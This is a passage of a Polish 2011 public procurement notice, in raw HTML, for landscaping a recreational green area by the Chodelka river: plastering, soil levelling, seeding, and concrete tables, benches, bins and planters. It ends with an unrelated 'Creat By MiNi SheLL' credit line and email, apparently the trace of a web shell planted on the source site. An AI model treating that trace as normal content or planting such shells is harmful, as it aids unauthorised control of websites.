przygotowanie widokowo-rekreacyjnego terenu zielonego nad rzeką Chodelką

1)	Wyprawa elewacyjna cienkowarstwowa o fakturze rustykalnej, 
	z gotowej suchej mieszanki , wykonywana ręcznie		-	263,48 m2

2)	przygotowanie widokowo-rekreacyjnego terenu zielonego nad rzeką Chodelką,
	poprzez usunięcie humusu, uzupełnienie niedoboru ziemi, plantowanie placu
	obsianie placu trawą						-	700,00 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.11.10.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie III)
Urządzenie i wyposażenie terenu zielonego w n/w elementy małej architektury ogrodowej:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Urządzenie i wyposażenie terenu zielonego w n/w elementy małej architektury ogrodowej:

-stół betonowy rekreacyjny do gry w piłkarzy ki			-  1 szt
-stół betonowy rekreacyjny do gry w szachy i chińczyka		-  2 szt
-ławka parkowa betonowa bez oparcia				-  4 szt
-ławka parkowa żeliwna z oparciem				-  2 szt
-kosz uliczny betonowy z daszkiem o poj. 26 l			-10 szt
-donica uliczna betonowa śr. 70 cm, wys. 40 cm			-   4 szt
-gablota zewnętrzna - wolnostojąca 10 x A4 , 8 xA4			-   2 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.53.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com